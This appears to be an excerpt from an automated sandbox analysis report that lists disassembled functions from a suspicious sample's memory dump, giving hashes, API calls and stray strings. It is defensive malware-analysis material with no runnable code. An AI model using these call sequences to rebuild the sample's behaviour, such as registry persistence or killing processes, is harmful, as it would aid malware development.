Instruction ID: 1a0be588f886ca56f8733cf1ff0f1bf0f381af3b43f086b9dd2581c37a5ff5b8
Opcode Fuzzy Hash: 7548cffac7ef2d06ec27d11f809e5d7d1fc94eb8e02ba572d3ec065b66f9f36a
Instruction Fuzzy Hash: EF118472200108FFEF115B94EC48EAA3B7DFB44795F108026FA08D5170DBBA9E95DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0075981B Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 00759827
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00759845
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0075984D
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0075986B
GetLastError.KERNEL32 ref: 0075987F
RegCloseKey.ADVAPI32(?), ref: 0075988A
CloseHandle.KERNEL32(00000000), ref: 00759891
GetLastError.KERNEL32 ref: 00759899

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: 6c3179dfc6db27c43365783a1b7d9107134f030308097bbbcd364708265af194
Instruction ID: a62383bd241d77cf4392e008a6a4aee49eb492a3fb510cabe6347599dfe14ac8
Opcode Fuzzy Hash: 6c3179dfc6db27c43365783a1b7d9107134f030308097bbbcd364708265af194
Instruction Fuzzy Hash: 33116175200208FFDB015FA4DC48FA93B69FB45392F108025FE0AC5260DB79E944DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00759425 Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(00774100,00000038,00761D8D,00000000,7476F5B0,0075AE6D,?,00000000,?,?,0075DA8B,?,?,?), ref: 00759436
StrChrA.SHLWAPI(00000000,00000020,?,00000000,?,?,0075DA8B,?,?,?), ref: 00759447

Part of subcall function 00764721: lstrlen.KERNEL32(npw,03F0C314,0077706E,00000000,0076EF9E), ref: 0076472A
Part of subcall function 00764721: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0076474D
Part of subcall function 00764721: memset.NTDLL ref: 0076475C

ExitProcess.KERNEL32 ref: 00759629

Part of subcall function 00756018: StrChrA.SHLWAPI(00000000,?,?,?,?,?,00754B4B,?,0000002C,?), ref: 0075603D
Part of subcall function 00756018: StrTrimA.SHLWAPI(00000000,00773FCC,00000000,?,?,?,00754B4B,?,0000002C,?), ref: 0075605C
Part of subcall function 00756018: StrChrA.SHLWAPI(00000000,?,?,?,?,00754B4B,?,0000002C,?), ref: 00756068

lstrcmp.KERNEL32(?,?), ref: 007594B5
VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,00000000,?,?,0075DA8B,?,?,?), ref: 007594CD

Part of subcall function 0075BD76: GetLastError.KERNEL32(000000FF,00000008,03F0C314,000000FF,03F0B7F0,?,?,0076F562,0000003A,03F0B7F0,?,?,?,007632F0,00000001,00000000), ref: 0075BDB6
Part of subcall function 0075BD76: CloseHandle.KERNEL32(000000FF,?,?,0076F562,0000003A,03F0B7F0,?,?,?,007632F0,00000001,00000000,03F0C314), ref: 0075BDC1

VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,00000000,?,?,0075DA8B,?,?,?), ref: 0075953F
lstrcmp.KERNEL32(?,?), ref: 00759558

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
String ID:
API String ID: 739714153-0
Opcode ID: 8d1bb7aef237df21ff938295674bb780f48f0a523cbee1b072324d283e2ea921
Instruction ID: a81b591ea7e019f65216f6ca5700d336dd8a48565282361882c50479641adecf
Opcode Fuzzy Hash: 8d1bb7aef237df21ff938295674bb780f48f0a523cbee1b072324d283e2ea921
Instruction Fuzzy Hash: EC51B071900218EFDF11ABA0CC49EEE7B79FF08742F104015FA09E6161E7BC995ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 00763C1F Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,00000010), ref: 00763C70
memcpy.NTDLL(00000000,?,?,00000010), ref: 00763D03
GetLastError.KERNEL32(?,?,00000010), ref: 00763D5B
GetLastError.KERNEL32 ref: 00763D8D
GetLastError.KERNEL32 ref: 00763DA1
GetLastError.KERNEL32 ref: 00763DB6

Strings

#*w, xrefs: 00763D99

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$memcpy
String ID: #*w
API String ID: 2760375183-1681918236
Opcode ID: c4ac2617de9f5792e7f1ece6ce3dd2b6c6c528b5a19802b0549168c4f47399f0
Instruction ID: 56a577084419ae6a08c9e9193542c5a544a38fb93aa99ac5f15dd264365bbead
Opcode Fuzzy Hash: c4ac2617de9f5792e7f1ece6ce3dd2b6c6c528b5a19802b0549168c4f47399f0
Instruction Fuzzy Hash: 36513FB1A04209FFDF10DFA8DC88AAE7BB9FB04394F108425F916E6250D7789E54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0076E015 Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E06F
lstrlen.KERNEL32(?,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E08D
RtlAllocateHeap.NTDLL(00000000,74716985,?), ref: 0076E0B9
memcpy.NTDLL(00000000,00000000,00000000,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E0D0
HeapFree.KERNEL32(00000000,00000000), ref: 0076E0E3
memcpy.NTDLL(00000000,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E0F2
HeapFree.KERNEL32(00000000,00000000,?,?,?,77D44620,?,?,?,?,0075CE7D,?,?,?,?,?), ref: 0076E156

Part of subcall function 0076EC2D: RtlLeaveCriticalSection.NTDLL(?), ref: 0076ECAA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: a8d19e75e944b996d06054c92a34e087d47fd949bce6a8371ef9d01215185390
Instruction ID: 18113c36896e1ca7bf983d770d21b5e2ec3037e2fce3d286fd3c3de176fa3a20
Opcode Fuzzy Hash: a8d19e75e944b996d06054c92a34e087d47fd949bce6a8371ef9d01215185390
Instruction Fuzzy Hash: 64419275500218EFDF219FA8DC48AAE7BA5FF05350F148025FD06A7161D7B8DE54EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0075FD0C Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 0075FD35
RtlEnterCriticalSection.NTDLL(00000000), ref: 0075FD78
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0075FD93
CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0075FDE9
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 0075FE45
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 0075FE53
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0075FE5E

Part of subcall function 0075BB6B: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0075BB7F
Part of subcall function 0075BB6B: memcpy.NTDLL(00000000,007531D1,?,?,00000008,?,?,007531D1,00000000,?,?), ref: 0075BBA8
Part of subcall function 0075BB6B: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?), ref: 0075BBD1
Part of subcall function 0075BB6B: RegCloseKey.ADVAPI32(?,?,?,007531D1,00000000,?,?), ref: 0075BBFC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID:
API String ID: 3181710096-0
Opcode ID: 31390b11f35929f972675965e0e855ca4abdb255228d3e7ab4e34ed7060538b3
Instruction ID: 3c52389b917eb053b364398a04bd75a6c920ba64f94241fa72ce32539c9b1765
Opcode Fuzzy Hash: 31390b11f35929f972675965e0e855ca4abdb255228d3e7ab4e34ed7060538b3
Instruction Fuzzy Hash: 0E418031300305AFDB218F65DC89FAA37A9EB44792F144038FD09DA161DBB8DD89DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0076DC2D Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0077808C), ref: 0076DC3F
lstrcpy.KERNEL32(00000000), ref: 0076DC7B

Part of subcall function 00751C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0075E657,00000000,00000000,-00000007,00760969,-00000007,?,?), ref: 00751CAA
Part of subcall function 00751C9B: mbstowcs.NTDLL ref: 00751CC6

GetLastError.KERNEL32(00000000), ref: 0076DD0A
HeapFree.KERNEL32(00000000,?), ref: 0076DD21
InterlockedDecrement.KERNEL32(0077808C), ref: 0076DD38
DeleteFileA.KERNEL32(00000000), ref: 0076DD59
HeapFree.KERNEL32(00000000,00000000), ref: 0076DD69

Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C
Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
Part of subcall function 0076E52A: GetCurrentThreadId.KERNEL32 ref: 0076E562
Part of subcall function 0076E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
Part of subcall function 0076E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
Part of subcall function 0076E52A: lstrcpy.KERNEL32(00000000), ref: 0076E59E

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID:
API String ID: 908044853-0
Opcode ID: 213da8480ac7366c9784952429906a5e250a2595b452b36928807f8221f7ca3d
Instruction ID: 1e44fd5c8fd8e0dac2f011a5e550f2ba9768f85aa761c063ed6b86d41f6c74ac
Opcode Fuzzy Hash: 213da8480ac7366c9784952429906a5e250a2595b452b36928807f8221f7ca3d
Instruction Fuzzy Hash: 4631B332F40218FBDB216FA4DC48AAD7BB5EB44790F158026FD0A9B150D77C8E81DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00759EC0 Relevance: 10.6, APIs: 7, Instructions: 107stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00771702: lstrlen.KERNEL32(00000000,?,00000000,00000008,00000000,?,00759EF2,?,00000000,00000004,00000000), ref: 0077170E
Part of subcall function 00771702: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,00759EF2,?,00000000,00000004,00000000), ref: 0077176C
Part of subcall function 00771702: lstrcpy.KERNEL32(00000000,00000008), ref: 0077177C

lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 00759F0C
wsprintfA.USER32 ref: 00759F3A
lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00759F98
GetLastError.KERNEL32 ref: 00759FAF
ResetEvent.KERNEL32(?), ref: 00759FC3
ResetEvent.KERNEL32(?), ref: 00759FC8
GetLastError.KERNEL32 ref: 00759FE0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
String ID:
API String ID: 2276693960-0
Opcode ID: 9d6929bafafea17539738d95f743044a2ecdaadc7cb83a9abd24307387138624
Instruction ID: 603087fa319c15c4060fdc846cc51cd5593ccd5d671d196c89b619cf217f42ee
Opcode Fuzzy Hash: 9d6929bafafea17539738d95f743044a2ecdaadc7cb83a9abd24307387138624
Instruction Fuzzy Hash: 55419C7140020AEFDF21DF64DC88BEA7BB9FF04355F004525FA09921A0E7B8DA58DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007552EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00760AD4,00000000), ref: 00755306
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0075531B
memset.NTDLL ref: 00755328
HeapFree.KERNEL32(00000000,00000000,?,00760AD3,?,?), ref: 00755345
memcpy.NTDLL(?,?,00760AD3,?,00760AD3,?,?), ref: 00755366

Strings

chun, xrefs: 007553E2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: chun
API String ID: 2362494589-3058818181
Opcode ID: 396a05069a72d204759272f6f1ef2dafd532fad874b3fa2aa0a9dd7968c4edf2
Instruction ID: d8c385597cb671eedbf6a755139e5c439899a0b149844449b0c735ade216e7f5
Opcode Fuzzy Hash: 396a05069a72d204759272f6f1ef2dafd532fad874b3fa2aa0a9dd7968c4edf2
Instruction Fuzzy Hash: 28319F31100B05EFEB219F65DC44E66B7E9EF05394B00842AE94ECB331D7B8E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0076E9C2 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0075DE0D,00000000,00778440,00778460,?,?,0075DE0D,0075EED0,00778440), ref: 0076E9D2
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0076E9E8
lstrlen.KERNEL32(0075EED0,?,?,0075DE0D,0075EED0,00778440), ref: 0076E9F0
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0076E9FC
lstrcpy.KERNEL32(00778440,0075DE0D), ref: 0076EA12
HeapFree.KERNEL32(00000000,00000000,?,?,0075DE0D,0075EED0,00778440), ref: 0076EA66
HeapFree.KERNEL32(00000000,00778440,?,?,0075DE0D,0075EED0,00778440), ref: 0076EA75

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: ea5f3e8082e9e310fe4e1224c8b22c7c0c63b353ae28db76ac28155573745325
Instruction ID: 393092fed4dccb757cd3786e5bc92a76ac80b3f9869a2946daf4f908af88f9b6
Opcode Fuzzy Hash: ea5f3e8082e9e310fe4e1224c8b22c7c0c63b353ae28db76ac28155573745325
Instruction Fuzzy Hash: 3621C235104244AFEF224FA8DC44F7A7FAAFB46380F14C059E88A57261C7399D46D775

Uniqueness

Uniqueness Score: -1.00%

Function 00756CDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,?,?), ref: 00756CFF

Part of subcall function 0075D191: lstrcpy.KERNEL32(-000000FC,00000000), ref: 0075D1CB
Part of subcall function 0075D191: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00756D0C,?,?,?), ref: 0075D1DD
Part of subcall function 0075D191: GetTickCount.KERNEL32 ref: 0075D1E8
Part of subcall function 0075D191: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,00756D0C,?,?,?), ref: 0075D1F4
Part of subcall function 0075D191: lstrcpy.KERNEL32(00000000), ref: 0075D20E

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

lstrcpy.KERNEL32(00000000), ref: 00756D3A
wsprintfA.USER32 ref: 00756D4D
GetTickCount.KERNEL32 ref: 00756D62
wsprintfA.USER32 ref: 00756D77

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

Strings

"%S", xrefs: 00756D47

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"
API String ID: 1152860224-1359967185
Opcode ID: fa2c9cd7cf6fe4ee28ac4f411e123cc567349f5d086c055670f621cdc0df0863
Instruction ID: 70cbe76a60d6592d6fb6cc9ae755bdeba3a61e5bb7cb4a242be763481d6a5633
Opcode Fuzzy Hash: fa2c9cd7cf6fe4ee28ac4f411e123cc567349f5d086c055670f621cdc0df0863
Instruction Fuzzy Hash: 4211E1B2605319BFCA20ABA49C4CEAB37ADEF44791B058414FD0C97202DA7CAD4587B2

Uniqueness

Uniqueness Score: -1.00%

Function 00758845 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71librarystringloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,03F0A2DE), ref: 00758873
GetProcAddress.KERNEL32(00000000), ref: 0075887A
_strupr.NTDLL ref: 007588E8
lstrlen.KERNEL32(00000000,?,00000000,?,00000103), ref: 007588F0
GetLastError.KERNEL32(?,00000000,?,00000103), ref: 00758918

Strings

W"w, xrefs: 007588DB

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressErrorHandleLastModuleProc_struprlstrlen
String ID: W"w
API String ID: 4219666113-4284564376
Opcode ID: 2fa1f9645f55530847a0bd66b32d911082159a0187e4a9eb0bf53b11720f744a
Instruction ID: 44370bf7e5c54b9737f54ab5e3b141abab88fe6617ec5d92314adbde12618eb9
Opcode Fuzzy Hash: 2fa1f9645f55530847a0bd66b32d911082159a0187e4a9eb0bf53b11720f744a
Instruction Fuzzy Hash: 8621B671904209EFDB90DF74DC08BE977A8AB04341F508068A849E7190EFBCEA84DB57

Uniqueness

Uniqueness Score: -1.00%

Function 00764A70 Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C
Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
Part of subcall function 0076E52A: GetCurrentThreadId.KERNEL32 ref: 0076E562
Part of subcall function 0076E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
Part of subcall function 0076E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
Part of subcall function 0076E52A: lstrcpy.KERNEL32(00000000), ref: 0076E59E

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,?,00000000,?,?,0075A242,00000000,00000000,00000004), ref: 00764AB1
HeapFree.KERNEL32(00000000,00000000,00001ED2,?,00000000,?,?,0075A242,00000000,00000000,00000004,?,00000000,?,00000000,?), ref: 00764B24

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: 7d838eaf4d230ebb019148ef7ce25c579e6b56adb8452e107585599357c415ee
Instruction ID: c4edb9bbfc8a6cd2f2f6475dbe3a96c79adcbb81e1eef21f04a7f31392a59b83
Opcode Fuzzy Hash: 7d838eaf4d230ebb019148ef7ce25c579e6b56adb8452e107585599357c415ee
Instruction Fuzzy Hash: 23110431240214FBD7222B70EC4DF6B7F5DEB057A1F008211FA0A911A1EA698994D6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00765701 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075F06A: lstrlen.KERNEL32(00000000,00000000,77D3EEF0,00000000,?,?,?,0076571A,?,74715520,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 0075F0D1
Part of subcall function 0075F06A: sprintf.NTDLL ref: 0075F0F2

lstrlen.KERNEL32(00000000,77D3EEF0,?,74715520,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 0076572C
lstrlen.KERNEL32(?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00765734

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

strcpy.NTDLL ref: 0076574B
lstrcat.KERNEL32(00000000,?), ref: 00765756

Part of subcall function 0075B5BE: lstrlen.KERNEL32(?,?,?,00000000,?,00765765,00000000,?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 0075B5CF

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00765773

Part of subcall function 0075EF47: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0076577F,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 0075EF51
Part of subcall function 0075EF47: _snprintf.NTDLL ref: 0075EFAF

Strings

=, xrefs: 0076576D

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 53ad871343d8d8878b09f639cb013d93ac7f358aed419b60ad1736118e85b5d3
Instruction ID: edaa3a90e09743d1ee617882ceda17710fe1478f47e72d1740f117ffe23cee09
Opcode Fuzzy Hash: 53ad871343d8d8878b09f639cb013d93ac7f358aed419b60ad1736118e85b5d3
Instruction Fuzzy Hash: C411C673900624FB4B127BB49C8DCAE36ADAF497903058125FD09A7202DE7DCD0297E1

Uniqueness

Uniqueness Score: -1.00%

Function 0076DE4D Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,00757FC0), ref: 0076DE78
CloseHandle.KERNEL32(?,?,00757FC0), ref: 0076DE84
CloseHandle.KERNEL32(00000000,7476F720,?,0075D297,00000000,?,?,?,00757FC0), ref: 0076DE96
memset.NTDLL ref: 0076DEAD
memset.NTDLL ref: 0076DEC4
memset.NTDLL ref: 0076DEDB
memset.NTDLL ref: 0076DEF2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset$CloseHandle$SwitchThread
String ID:
API String ID: 3699883640-0
Opcode ID: 6e895d33c8e1881818caa5d581c9fd8c3c14db31a81903085a11f85da17b9cfa
Instruction ID: 58ad4ea61d3a546071a9e3b890ae5dc80819ec9dfb1362fe51944a2b8ea72b88
Opcode Fuzzy Hash: 6e895d33c8e1881818caa5d581c9fd8c3c14db31a81903085a11f85da17b9cfa
Instruction Fuzzy Hash: F8119431E81E14E6C6A13715EC0DC8F3A69BFD6B92B184135F80DE3123DF6D4D8186AA

Uniqueness

Uniqueness Score: -1.00%

Function 00751000 Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00751031
wcstombs.NTDLL ref: 00751042

Part of subcall function 0076BBD0: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00751058,00000000), ref: 0076BBE2
Part of subcall function 0076BBD0: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00751058,00000000), ref: 0076BBF1

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 00751063
TerminateProcess.KERNEL32(00000000,00000000), ref: 00751072
CloseHandle.KERNEL32(00000000), ref: 00751079
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00751088
WaitForSingleObject.KERNEL32(00000000), ref: 00751098

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 7896b5d951b33c01f4369a4fa6c3a03bee7759d23bd33cb241fc03bcad6c6e5e
Instruction ID: 671dc3fe1d7bdb86b1db2ae710e8befe4d6ec3e960516b2fb06f0b5718f10477
Opcode Fuzzy Hash: 7896b5d951b33c01f4369a4fa6c3a03bee7759d23bd33cb241fc03bcad6c6e5e
Instruction Fuzzy Hash: A711B231200215FBE7215B64DC49FAA77A9FB04782F408011F90D921A0C7BDDED5DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 007606B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,?), ref: 007606DF
RtlEnterCriticalSection.NTDLL(00778448), ref: 007606EC
RtlLeaveCriticalSection.NTDLL(00778448), ref: 007606FF
lstrcmpi.KERNEL32(00778460,00000000), ref: 0076071F
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00753728,00000000), ref: 00760733

Strings

(7u, xrefs: 00760739

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID: (7u
API String ID: 1266740956-2037902285
Opcode ID: aee43d06003f5fb525b4b3bfbf759a9c69533f3be0e5d53d2d5e77e5d54b4b32
Instruction ID: 9df42007750a4fd1702d6863f817ed69317a71584d744c11c02844cc9aacc779
Opcode Fuzzy Hash: aee43d06003f5fb525b4b3bfbf759a9c69533f3be0e5d53d2d5e77e5d54b4b32
Instruction Fuzzy Hash: DA11813150020AEFDF44CF58D88DA9AB7A8FF04368F148065E80E97250CB7CAE41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00768F9B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58threadCOMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(00000000), ref: 00768FDB
memset.NTDLL ref: 00768FEF
GetWindowThreadProcessId.USER32(00000000,?), ref: 00768FFC

Part of subcall function 0076CE46: OpenProcess.KERNEL32(00000410,FD189D89,00769026,00000000,0000001C,00000000,00000000,?,?,?,00769026), ref: 0076CEA0
Part of subcall function 0076CE46: CloseHandle.KERNEL32(00000000,00000000,00000000,00769036,00000104,?,?,?,00769026), ref: 0076CEBE
Part of subcall function 0076CE46: GetSystemTimeAsFileTime.KERNEL32(00769026), ref: 0076CF26

GlobalUnWire.KERNEL32(00000000), ref: 00769027

Strings

t'w, xrefs: 00769011
'w, xrefs: 00768FA3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

